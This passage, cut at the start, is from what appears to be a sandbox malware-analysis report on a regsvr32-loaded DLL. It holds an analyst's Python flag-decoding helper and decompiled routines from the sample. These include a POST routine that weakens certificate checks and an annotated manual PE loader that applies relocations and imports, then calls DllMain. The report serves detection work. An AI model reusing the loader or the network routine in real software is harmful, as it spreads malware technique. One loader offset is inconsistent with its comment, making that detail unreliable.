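inference from argument counts and constants, not something the report states.
"""
from functools import reduce

# HttpOpenRequest dwFlags bits (wininet.h values).
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00040000: "INTERNET_FLAG_NO_COOKIES",
    0x00008000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00004000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00000400: "INTERNET_FLAG_NO_UI",
    0x00000200: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
KNOWN_MASK = reduce(lambda a, b: a | b, INTERNET_FLAGS)

# InternetOpen dwAccessType values tried by the two-iteration loop (_v28 = 1, _v24 = 4).
ACCESS_TYPES = {1: "INTERNET_OPEN_TYPE_DIRECT",
                4: "INTERNET_OPEN_TYPE_PRECONFIG_WITH_NO_AUTOPROXY"}

# URL_COMPONENTSA on 32-bit Windows: 15 DWORD-sized slots = 0x3c bytes, the value
# the routine stores in _v116 before the 4-argument call at table offset 0x28.
URL_COMPONENTSA_FIELDS = [
    "dwStructSize", "lpszScheme", "dwSchemeLength", "nScheme",
    "lpszHostName", "dwHostNameLength", "nPort",
    "lpszUserName", "dwUserNameLength", "lpszPassword", "dwPasswordLength",
    "lpszUrlPath", "dwUrlPathLength", "lpszExtraInfo", "dwExtraInfoLength",
]


def decode_flags(value):
    """Split an HttpOpenRequest dwFlags value into (sorted names, unexplained bits)."""
    names = sorted(n for bit, n in INTERNET_FLAGS.items() if value & bit)
    return names, value & ~KNOWN_MASK & 0xFFFFFFFF


def tls_validation_weakened(value):
    """True when the request ignores certificate CN or date errors."""
    return bool(value & (0x00002000 | 0x00001000))


def url_components_field(struct_var, var):
    """Map a decompiler stack variable (_vN lives at ebp-N) onto the URL_COMPONENTSA
    field it occupies when the structure starts at _v<struct_var>."""
    return URL_COMPONENTSA_FIELDS[(struct_var - var) // 4]


# WinINet ANSI entry points: parameter count plus the constants that pin them down.
WININET_SIGS = {
    "InternetCrackUrlA":   (4, {}),
    "InternetOpenA":       (5, {2: 0, 3: 0, 4: 0}),   # no proxy, no bypass, no flags
    "HttpSendRequestA":    (5, {}),
    "HttpQueryInfoA":      (5, {1: 0x13}),            # HTTP_QUERY_STATUS_CODE
    "InternetConnectA":    (8, {5: 3}),               # INTERNET_SERVICE_HTTP
    "HttpOpenRequestA":    (8, {1: "POST"}),          # verb in the second slot
    "InternetCloseHandle": (1, {}),
}


def identify(args):
    """Return the best-matching name(s) for one call's argument list (most specific
    signature wins); an empty list means no WinINet signature fits."""
    best, best_score = [], -1
    for name, (argc, constraints) in WININET_SIGS.items():
        if argc != len(args) or any(args[i] != v for i, v in constraints.items()):
            continue
        score = len(constraints)
        if score > best_score:
            best, best_score = [name], score
        elif score == best_score:
            best.append(name)
    return best


# Calls through the table at 0x9af8f0 as they appear in the listing above
# (table offset -> arguments; strings are the decompiler's variable names, not values).
OBSERVED_CALLS = {
    0x28: ["url", "url_len", 0, "&_v116"],
    0x00: ["*0x9af9d8", "access_type", 0, 0, 0],
    0x1c: ["hInternet", "&_v388", "_v92", 0, 0, 3, 0, 0],
    0x20: ["hConnect", "POST", "&_v644", 0, 0, "&_v56", 0x8404f700, 0],
    0x24: ["hRequest", "_t193", "headers_len", "_a4", "_a8"],
    0x0c: ["hRequest", 0x13, "&_v20", "&_v24", 0],
    0x08: ["handle"],
}


def resolve_table():
    """Name every observed table slot; the result is the reconstructed import table."""
    return {off: identify(args) for off, args in OBSERVED_CALLS.items()}


if __name__ == "__main__":
    for off, names in sorted(resolve_table().items()):
        print(f"0x9af8f0+0x{off:02x}: {', '.join(names) or 'unknown'}")
    for flags in (0x8404f700, 0x8484f700):
        names, rest = decode_flags(flags)
        print(f"{flags:#010x}: {' | '.join(names)}  residue={rest:#x}  "
              f"cert checks weakened={tls_validation_weakened(flags)}")
    print("_v104 ->", url_components_field(116, 104), "; _v92 ->", url_components_field(116, 92))
```

Read together with the listing: the routine returns -4 when the URL does not parse, makes at most two InternetOpenA attempts, returns 0 and hands back the three handles (_a12, _a16, _a20) only when the status line parses to 200, and otherwise closes every handle through the slot at +0x08 and returns a negative code. For detection work, the weakened certificate checks combined with INTERNET_FLAG_NO_UI and INTERNET_FLAG_NO_COOKIES are the behavioural fingerprint worth carrying into network-side rules.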
            Instruction address column (one entry per pseudocode line in the side-by-side view; 0x00000000 marks lines with no mapped instruction), collapsed: 0x0099f7b1 to 0x0099faa8

            APIs
            • memset.MSVCRT ref: 0099F7D4
            • memset.MSVCRT ref: 0099F7E5
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0099F8BA
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memset$ErrorLast
            • String ID: POST
            • API String ID: 2570506013-1814004025
            • Opcode ID: 0fb9bd38627b1415b34083df062a37e16f9093f0853ff9c9817b122cf9cdf42f
            • Instruction ID: 5b96dce06d702873cbe570a23ad075ced5bf2a4eeca0aea17b2bf5eaa039db73
            • Opcode Fuzzy Hash: 0fb9bd38627b1415b34083df062a37e16f9093f0853ff9c9817b122cf9cdf42f
            • Instruction Fuzzy Hash: 94A13C71A04219AFDF10DFA8D898BAEB7B8FF49310F244069F906E7250DB749E41DB91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _snprintfqsort
            • String ID: %I64d$false$null$true
            • API String ID: 756996078-4285102228
            • Opcode ID: 972d32358749b9eb9179c434f7a709bed863f7960b4d54c0bf401c3c6bf315d8
            • Instruction ID: 00dd471b7b76575abc8a51330cf421e2972195ec3828c864226b9ef26c56a4ba
            • Opcode Fuzzy Hash: 972d32358749b9eb9179c434f7a709bed863f7960b4d54c0bf401c3c6bf315d8
            • Instruction Fuzzy Hash: 68E16BB190020ABFEF119FA4CC42FAF3BA9EF97354F108415FD159A151E635DA609BE0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E0099503F(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
            				void _v532;
            				char _v548;
            				char _v580;
            				char _v584;
            				short _v588;
            				WCHAR* _v592;
            				WCHAR* _v596;
            				intOrPtr _v600;
            				char _v628;
            				char _v632;
            				void* __ebx;
            				void* __esi;
            				short _t47;
            				WCHAR* _t54;
            				WCHAR* _t55;
            				intOrPtr _t56;
            				signed int _t61;
            				void* _t65;
            				void* _t66;
            				WCHAR* _t67;
            				intOrPtr _t68;
            				WCHAR* _t70;
            				intOrPtr _t71;
            				WCHAR* _t73;
            				WCHAR* _t83;
            				intOrPtr _t84;
            				void* _t85;
            				intOrPtr _t86;
            				void* _t93;
            				intOrPtr _t94;
            				intOrPtr _t96;
            				void* _t99;
            				void* _t100;
            				WCHAR* _t101;
            				void* _t112;
            				WCHAR* _t116;
            				intOrPtr _t127;
            				void* _t128;
            				void* _t146;
            				WCHAR* _t149;
            				void* _t150;
            				void* _t152;
            				void* _t156;
            				WCHAR* _t157;
            				WCHAR* _t159;
            				signed int _t160;
            				signed int _t161;
            				intOrPtr* _t163;
            				signed int _t165;
            				void* _t168;
            				void* _t169;
            				intOrPtr* _t170;
            				void* _t175;
            
            				_t175 = __fp0;
            				_push(_t160);
            				_t99 = __edx;
            				_t156 = __ecx;
            				_t161 = _t160 | 0xffffffff;
            				memset( &_v532, 0, 0x20c);
            				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
            				_v592 = 1;
            				if(_t156 != 0) {
            					_t94 =  *0x9af8d4; // 0x452fc00
            					_t96 =  *0x9af8d8; // 0x452fab0
            					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x110)))));
            				}
            				if(E0099CB85(_t156) != 0) {
            					L4:
            					_t47 = E0099C85A();
            					_push(_t99);
            					_v588 = _t47;
            					E0099C64D(_t47,  &_v580, _t173, _t175);
            					_t100 = E00994FFB( &_v580,  &_v580, _t173);
            					_t112 = E0099E34A( &_v580, E0099A5D0( &_v580), 0);
            					E0099C870(_t112,  &_v548, _t175);
            					_push(_t112);
            					_t54 = E00993174(_t156,  &_v580, _t173, _t175);
            					_v596 = _t54;
            					if(_t54 != 0) {
            						_push(0);
            						_push(_t100);
            						_push(0x9ac9d8);
            						_t55 = E00999C50(_t54);
            						_t169 = _t168 + 0x10;
            						_t101 = _t55;
            						__eflags = _v592;
            						if(__eflags != 0) {
            							_t56 = E00999AB3(_v596);
            							_t116 = _t101;
            							 *0x9af990 = _t56;
            							 *0x9af988 = E00999AB3(_t116);
            							L12:
            							_push(_t116);
            							_t157 = E0099A7C6( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
            							_t170 = _t169 + 0x10;
            							__eflags = _t157;
            							if(_t157 == 0) {
            								goto L36;
            							}
            							_push(0x9aca26);
            							_t146 = 0xe;
            							E0099AC36(_t146, _t175);
            							E0099AC6F(_t157, _t175, _t101);
            							_t163 = _a4;
            							_push( *_t163);
            							E0099AC11(0xb);
            							_t148 =  *(_t163 + 0x10);
            							__eflags =  *(_t163 + 0x10);
            							if( *(_t163 + 0x10) != 0) {
            								E0099B1B1(_t148, _t175);
            							}
            							_t149 =  *(_t163 + 0xc);
            							__eflags = _t149;
            							if(_t149 != 0) {
            								E0099B1B1(_t149, _t175);
            							}
            							_t65 = E0099A1F8(0);
            							_push(_t149);
            							_t150 = 2;
            							_t66 = E0099ABE3();
            							__eflags = _v592;
            							_t127 = _t65;
            							if(_v592 == 0) {
            								_t127 =  *0x9af8d4; // 0x452fc00
            								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
            								if(__eflags != 0) {
            									_t67 = E009A0DDF(_t66, _t101, _t150, _t175, 0, _t101, 0);
            									_t170 = _t170 + 0xc;
            									goto L21;
            								}
            								_t127 = _t127 + 0x228;
            								goto L20;
            							} else {
            								_t68 =  *0x9af8d4; // 0x452fc00
            								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
            								if(__eflags != 0) {
            									L27:
            									__eflags =  *(_t68 + 0x1898) & 0x00000082;
            									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
            										_t152 = 0x64;
            										E0099F15B(_t152);
            									}
            									E0099565D( &_v580, _t175);
            									_t159 = _a8;
            									_t128 = _t127;
            									__eflags = _t159;
            									if(_t159 != 0) {
            										_t71 =  *0x9af8d4; // 0x452fc00
            										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
            										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
            											lstrcpyW(_t159, _t101);
            										} else {
            											_t73 = E0099109A(_t128, 0x153);
            											_v596 = _t73;
            											lstrcpyW(_t159, _t73);
            											E00998D9A( &_v596);
            											 *_t170 = "\"";
            											lstrcatW(_t159, ??);
            											lstrcatW(_t159, _t101);
            											lstrcatW(_t159, "\"");
            										}
            									}
            									_t70 = _a12;
            									__eflags = _t70;
            									if(_t70 != 0) {
            										 *_t70 = _v588;
            									}
            									_t161 = 0;
            									__eflags = 0;
            									goto L36;
            								}
            								_t32 = _t68 + 0x228; // 0x452fe28
            								_t127 = _t32;
            								L20:
            								_t67 = E009958D2(_t127, _t101, __eflags);
            								L21:
            								__eflags = _t67;
            								if(_t67 >= 0) {
            									_t68 =  *0x9af8d4; // 0x452fc00
            									goto L27;
            								}
            								_push(0xfffffffd);
            								L6:
            								_pop(_t161);
            								goto L36;
            							}
            						}
            						_t83 = E0099D210(_v588, __eflags);
            						_v596 = _t83;
            						_t84 =  *0x9af8d0; // 0x452f8c0
            						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
            						__eflags = _t85 - _t161;
            						if(_t85 != _t161) {
            							_t86 =  *0x9af8d0; // 0x452f8c0
            							 *((intOrPtr*)(_t86 + 0x30))();
            							E00998DDF( &_v632, _t161);
            							_t116 = _t85;
            							goto L12;
            						}
            						E00998DDF( &_v628, _t161);
            						_t61 = 1;
            						goto L37;
            					}
            					_push(0xfffffffe);
            					goto L6;
            				} else {
            					_t93 = E0099308A( &_v532, _t161, 0x105);
            					_t173 = _t93;
            					if(_t93 == 0) {
            						L36:
            						_t61 = _t161;
            						L37:
            						return _t61;
            					}
            					goto L4;
            				}
            			}
            Instruction address column (one entry per pseudocode line in the side-by-side view; 0x00000000 marks lines with no mapped instruction), collapsed: 0x0099503f to 0x00995314

            APIs
            • memset.MSVCRT ref: 00995061
            • lstrcpyW.KERNEL32 ref: 009952C7
            • lstrcatW.KERNEL32(00000000,?), ref: 009952E5
            • lstrcatW.KERNEL32(00000000,00000000), ref: 009952E9
            • lstrcatW.KERNEL32(00000000,009ACA28), ref: 009952F1
              • Part of subcall function 00998DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00998E25
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrcat$FreeHeaplstrcpymemset
            • String ID:
            • API String ID: 911671052-0
            • Opcode ID: 685742017ed7526f53c98257fab9c89ce096b7c82f4ab30b93be853f0fffe30c
            • Instruction ID: d3cc5a97c2386258420868a428006cb8e38490418f70b194ecb83e56dde1a2bb
            • Opcode Fuzzy Hash: 685742017ed7526f53c98257fab9c89ce096b7c82f4ab30b93be853f0fffe30c
            • Instruction Fuzzy Hash: E271FC31208301ABDB25EB28DC92B7F73EAEFC5710F14092DF4568B291EB7498048B82
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E0099DEAB(WCHAR* __ecx) {
            				int _v8;
            				WCHAR* _v12;
            				WCHAR* _v16;
            				WCHAR* _v140;
            				WCHAR* _v144;
            				short _v664;
            				signed int _t28;
            				signed int _t29;
            				signed int _t30;
            				WCHAR* _t36;
            				int _t40;
            				signed int _t41;
            				int _t44;
            				signed int _t45;
            				WCHAR* _t49;
            				signed int _t51;
            				WCHAR* _t52;
            				void* _t53;
            
            				_v8 = _v8 & 0x00000000;
            				_v16 = __ecx;
            				_t51 = 0;
            				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
            				_t44 = _v8;
            				_t41 = 0;
            				_v12 = _t28;
            				if(_t44 <= 0) {
            					L22:
            					_t29 = _t28 | 0xffffffff;
            					__eflags = _t29;
            					return _t29;
            				} else {
            					goto L1;
            				}
            				do {
            					L1:
            					_t49 =  *(_t28 + _t41 * 4);
            					_t30 =  *_t49 & 0x0000ffff;
            					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
            						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
            						_t40 = lstrlenW(_t49);
            						_t45 = 0;
            						if(_t40 <= 0) {
            							L11:
            							_t44 = _v8;
            							_t51 = _t51 + 1;
            							goto L12;
            						} else {
            							goto L8;
            						}
            						do {
            							L8:
            							if(_t49[_t45] == 0x2c) {
            								_t49[_t45] = 0;
            							}
            							_t45 = _t45 + 1;
            						} while (_t45 < _t40);
            						goto L11;
            					}
            					L12:
            					_t28 = _v12;
            					_t41 = _t41 + 1;
            				} while (_t41 < _t44);
            				if(_t51 != 1) {
            					if(__eflags <= 0) {
            						goto L22;
            					}
            					_t52 = _v140;
            					L17:
            					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
            						lstrcpynW(_v16, _t52, 0x104);
            					} else {
            						GetCurrentDirectoryW(0x104,  &_v664);
            						_push(0);
            						_push(_t52);
            						_push(0x9ac9d8);
            						_t36 = E00999C50( &_v664);
            						_v12 = _t36;
            						lstrcpynW(_v16, _t36, 0x104);
            						E00998DDF( &_v12, 0xfffffffe);
            					}
            					return 0;
            				}
            				_t52 = _v144;
            				goto L17;
            			}
            Instruction address column (one entry per pseudocode line in the side-by-side view; 0x00000000 marks lines with no mapped instruction), collapsed: 0x0099deb4 to 0x0099dfb3

            APIs
            • GetCommandLineW.KERNEL32 ref: 0099DEC0
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0099DECB
            • lstrlenW.KERNEL32 ref: 0099DF0D
            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0099DF66
            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0099DF8B
            • lstrcpynW.KERNEL32(?,?,00000104), ref: 0099DFA9
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
            • String ID:
            • API String ID: 1259063344-0
            • Opcode ID: cedcc27495eae47c5f77caad286fe19cd7c739a7e95607abbe051af49cf8da20
            • Instruction ID: eb78968c7b46988b08ef317f42779774a034d456369394256581bd3ae1a2f911
            • Opcode Fuzzy Hash: cedcc27495eae47c5f77caad286fe19cd7c739a7e95607abbe051af49cf8da20
            • Instruction Fuzzy Hash: C0313471C25115ABDF24AB9DDCCABAEB7B8EF46350F50409AE407E7190EB708D808B90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 0099E6ED
            • SysAllocString.OLEAUT32(?), ref: 0099E6F5
            • SysAllocString.OLEAUT32(00000000), ref: 0099E709
            • SysFreeString.OLEAUT32(?), ref: 0099E784
            • SysFreeString.OLEAUT32(?), ref: 0099E787
            • SysFreeString.OLEAUT32(?), ref: 0099E78C
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 1b347694af4bdba32b722ad52f04cda4a8488db9b1cced20559dd3bb86ca2441
            • Instruction ID: 50ca2bd7b9a73672555c76c52319def7a79c55bc63c249a7fcc1270e06576b87
            • Opcode Fuzzy Hash: 1b347694af4bdba32b722ad52f04cda4a8488db9b1cced20559dd3bb86ca2441
            • Instruction Fuzzy Hash: 4821F975900218BFDF00DFA9CC88DAEBBBDEF89754B204499F505E7250DA71AE01DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 20%
            			E009A3DC7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
            				signed int _v5;
            				signed short _v12;
            				intOrPtr* _v16;
            				intOrPtr _v20;
            				signed int* _v24;
            				unsigned int _v28;
            				signed short* _v32;
            				struct HINSTANCE__* _v36;
            				signed int _v40;
            				signed int _v44;
            				intOrPtr* _v48;
            				signed short* _v52;
            				intOrPtr _v56;
            				unsigned int _v60;
            				intOrPtr _v64;
            				_Unknown_base(*)()* _v68;
            				signed int _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				intOrPtr _v84;
            				unsigned int _v88;
            				intOrPtr _v92;
            				signed int _v96;
            				intOrPtr _v100;
            				intOrPtr _v104;
            				intOrPtr _v108;
            				intOrPtr _v112;
            				CHAR* _v116;
            				signed int _v120;
            				intOrPtr _v124;
            				signed int _v128;
            				signed int _v132;
            				signed int _t216;
            				signed int _t233;
            				void* _t273;
            				signed int _t278;
            				signed int _t280;
            				intOrPtr _t320;
            
            				_v44 = _v44 & 0x00000000;
            				// _a4 is the in-memory image base; e_lfanew at offset 0x3c locates IMAGE_NT_HEADERS
            				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
            				_v20 = _v84;
            				// delta between the actual load address and OptionalHeader.ImageBase (NT header + 0x34);
            				// a non-zero delta means the base-relocation table must be applied first
            				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
            				_v64 = _t320;
            				if(_t320 == 0) {
            					L13:
            					while(0 != 0) {
            					}
            					_push(8);
            					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
            						L35:
            						if(_a16 == 0) {
            							L54:
            							// AddressOfEntryPoint (NT header + 0x28), rebased onto the mapped image
            							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
            							while(0 != 0) {
            							}
            							if(_a12 != 0) {
            								 *_a12 = _v80;
            							}
            							// rewrite ImageBase to the real base, then call the entry point as
            							// DllMain(hModule, DLL_PROCESS_ATTACH (1), lpReserved)
            							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
            							_v124 = _v80(_a4, 1, _a8);
            							while(0 != 0) {
            							}
            							if(_v124 != 0) {
            								if(_v44 == 0) {
            									L77:
            									return 1;
            								}
            								if(_a20 != 1) {
            									if(_a20 != 2) {
            										L75:
            										while(0 != 0) {
            										}
            										goto L77;
            									}
            									while(0 != 0) {
            									}
            									_v132 = _v44;
            									goto L75;
            								}
            								while(0 != 0) {
            								}
            								_v44();
            								goto L75;
            							}
            							while(0 != 0) {
            							}
            							return 0;
            						}
            						while(0 != 0) {
            						}
            						_push(8);
            						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
            							goto L54;
            						}
            						_v128 = 0x80000000;
            						_t216 = 8;
            						// export directory: DataDirectory[0] lives at NT header + 0x78
            						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
            						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20)); // AddressOfNames
            						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c)); // AddressOfFunctions
            						_v104 =  *((intOrPtr*)(_v76 + 0x18)); // NumberOfNames
            						while(0 != 0) {
            						}
            						_v40 = _v40 & 0x00000000;
            						while(_v40 < _v104) {
            							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
            							// note: the function table is indexed with the name index directly,
            							// without going through AddressOfNameOrdinals
            							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
            							// linear scan of the export name table for the export named by _a16
            							if(lstrcmpA(_v116, _a16) != 0) {
            								_v40 = _v40 + 1;
            								continue;
            							}
            							while(0 != 0) {
            							}
            							_v44 = _v120;
            							break;
            						}
            						if(_v44 != 0) {
            							goto L54;
            						}
            						while(0 != 0) {
            						}
            						return 0xffffffff;
            					}
            					_v96 = 0x80000000; // IMAGE_ORDINAL_FLAG32
            					_t233 = 8;
            					// import directory: DataDirectory[1] at NT header + 0x80 (first IMAGE_IMPORT_DESCRIPTOR)
            					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
            					// walk the descriptors (0x14 bytes each) until the one with a zero Name (+0xc);
            					// each dependency is resolved with GetModuleHandleA, falling back to LoadLibraryA
            					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
            						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
            						if(_v36 == 0) {
            							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
            						}
            						if(_v36 != 0) {
            							// OriginalFirstThunk (+0) is preferred; FirstThunk (+0x10) is used when it is absent
            							if( *_v16 == 0) {
            								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
            							} else {
            								_v24 =  *_v16 + _a4;
            							}
            							_v72 = _v72 & 0x00000000;
            							while( *_v24 != 0) {
            								// ordinal flag clear: thunk points at IMAGE_IMPORT_BY_NAME, whose Name follows
            								// the 2-byte Hint (hence +2); flag set: low 16 bits are the ordinal
            								if(( *_v24 & _v96) == 0) {
            									_v100 =  *_v24 + _a4;
            									_v68 = GetProcAddress(_v36, _v100 + 2);
            								} else {
            									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
            								}
            								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
            									 *_v24 = _v68;
            								} else {
            									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
            								}
            								_v24 =  &(_v24[1]);
            								_v72 = _v72 + 4;
            							}
            							_v16 = _v16 + 0x14;
            							continue;
            						} else {
            							_t273 = 0xfffffffd; // -3: a dependency could not be loaded
            							return _t273;
            						}
            					}
            					goto L35;
            				}
            				_t278 = 8;
            				// base relocation table: DataDirectory[5] at NT header + 0xa0, its size at + 0xa4
            				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
            				_t280 = 8;
            				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
            				while(0 != 0) {
            				}
            				// each IMAGE_BASE_RELOCATION block: VirtualAddress (+0), SizeOfBlock (+4),
            				// then (SizeOfBlock - 8) / 2 two-byte entries starting at +8
            				while(_v56 > 0) {
            					_v28 = _v52[2];
            					_v56 = _v56 - _v28;
            					_v28 = _v28 - 8;
            					_v28 = _v28 >> 1;
            					_v32 =  &(_v52[4]);
            					_v92 = _a4 +  *_v52;
            					_v60 = _v28;
            					while(1) {
            						_v88 = _v60;
            						_v60 = _v60 - 1;
            						if(_v88 == 0) {
            							break;
            						}
            						// entry: type in the top 4 bits, page offset in the low 12 bits
            						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
            						_v12 =  *_v32 & 0xfff;
            						_v48 = (_v12 & 0x0000ffff) + _v92;
            						// IMAGE_REL_BASED_HIGHLOW (3) and IMAGE_REL_BASED_DIR64 (0xa) both get the load delta added
            						if((_v5 & 0x000000ff) != 3) {
            							if((_v5 & 0x000000ff) == 0xa) {
            								 *_v48 =  *_v48 + _v64;
            							}
            						} else {
            							 *_v48 =  *_v48 + _v64;
            						}
            						_v32 =  &(_v32[1]);
            					}
            					_v52 = _v32;
            				}
            				goto L13;
            			}

            0x009a3dd0
            0x009a3ddd
            0x009a3de3
            0x009a3dec
            0x009a3def
            0x009a3df2
            0x00000000
            0x009a3ee3
            0x009a3ee7
            0x009a3ee9
            0x009a3ef7
            0x009a4015
            0x009a4019
            0x009a40de
            0x009a40e7
            0x009a40ea
            0x009a40ee
            0x009a40f4
            0x009a40fc
            0x009a40fc
            0x009a4104
            0x009a4112
            0x009a4115
            0x009a4119
            0x009a411f
            0x009a412f
            0x009a415a
            0x00000000
            0x009a415c
            0x009a4135
            0x009a4146
            0x00000000
            0x009a4154
            0x009a4158
            0x00000000
            0x009a4154
            0x009a4148
            0x009a414c
            0x009a4151
            0x00000000
            0x009a4151
            0x009a4137
            0x009a413b
            0x009a413d
            0x00000000
            0x009a413d
            0x009a4121
            0x009a4125
            0x00000000
            0x009a4127
            0x009a401f
            0x009a4023
            0x009a4025
            0x009a4033
            0x00000000
            0x00000000
            0x009a4039
            0x009a4042
            0x009a4050
            0x009a405c
            0x009a4068
            0x009a4071
            0x009a4074
            0x009a4078
            0x009a407a
            0x009a4087
            0x009a409b
            0x009a40aa
            0x009a40bb
            0x009a4084
            0x00000000
            0x009a4084
            0x009a40bd
            0x009a40c1
            0x009a40c6
            0x00000000
            0x009a40c6
            0x009a40d1
            0x00000000
            0x00000000
            0x009a40d3
            0x009a40d7
            0x00000000
            0x009a40d9
            0x009a3efd
            0x009a3f06
            0x009a3f14
            0x009a3f17
            0x009a3f34
            0x009a3f3b
            0x009a3f4d
            0x009a3f4d
            0x009a3f54
            0x009a3f64
            0x009a3f7c
            0x009a3f66
            0x009a3f6e
            0x009a3f6e
            0x009a3f7f
            0x009a3f83
            0x009a3f93
            0x009a3fb6
            0x009a3fc8
            0x009a3f95
            0x009a3fa9
            0x009a3fa9
            0x009a3fd2
            0x009a3fee
            0x009a3fd4
            0x009a3fe3
            0x009a3fe3
            0x009a3ff6
            0x009a3fff
            0x009a3fff
            0x009a400d
            0x00000000
            0x009a3f56
            0x009a3f58
            0x00000000
            0x009a3f58
            0x009a3f54
            0x00000000
            0x009a3f17
            0x009a3dfa
            0x009a3e08
            0x009a3e0d
            0x009a3e18
            0x009a3e1b
            0x009a3e1f
            0x009a3e21
            0x009a3e31
            0x009a3e3a
            0x009a3e43
            0x009a3e4b
            0x009a3e54
            0x009a3e5f
            0x009a3e65
            0x009a3e68
            0x009a3e6b
            0x009a3e72
            0x009a3e79
            0x00000000
            0x00000000
            0x009a3e84
            0x009a3e92
            0x009a3e9d
            0x009a3ea7
            0x009a3ebf
            0x009a3ecc
            0x009a3ecc
            0x009a3ea9
            0x009a3eb4
            0x009a3eb4
            0x009a3ed3
            0x009a3ed3
            0x009a3edb
            0x009a3edb
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(00000000), ref: 009A3F2E
            • LoadLibraryA.KERNEL32(00000000), ref: 009A3F47
            • GetProcAddress.KERNEL32(00000000,?), ref: 009A3FA3
            • GetProcAddress.KERNEL32(00000000,?), ref: 009A3FC2
            • lstrcmpA.KERNEL32(?,00000000), ref: 009A40B3
            Memory Dump Source
